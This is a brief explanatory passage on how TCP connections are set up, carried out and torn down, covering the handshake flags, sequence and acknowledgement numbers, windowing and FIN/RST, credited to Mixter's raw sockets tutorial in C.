TC P initiation ("3-way handshake") and connection: The client will do a connection initiation, with the tcp SYN flag set, an arbitrary sequence number, and no acknowledgement number. The server acknowledges the SYN by sending a packet with SYN and AC K set, another random sequence number and the acknowledgement number the original sequence. Finally, the client replies back with a tcp datagram with the AC K flag set, and the server's ack sequence incremented by one. Once the connection is established, each tcp segment will be sent with no flags (PSH and URG are optional), the sequence number for each packet incremented by the size of the previous tcp segment. After the amount of data specified as "window size" has been transferred, the peer sending data will wait for an acknowledgement, a tcp segment with the AC K flag set and the ack sequence number the one of the last data packet that could be received in order. That way, if any segments get lost, they will not be acknowledged and can be retransmitted. To end a connection, both server and client send a tcp packet with correct sequence numbers and the FIN flag set, and if the connection ever de-synchronizes (aborted, desynchronized, bad sequence numbers, etc.) the peer that notices the error will send a RST packet with correct seq numbers to terminate the connection.
A brief programming tutorial in C for raw sockets http://mixter.void.ru/rawip.html
- Mixter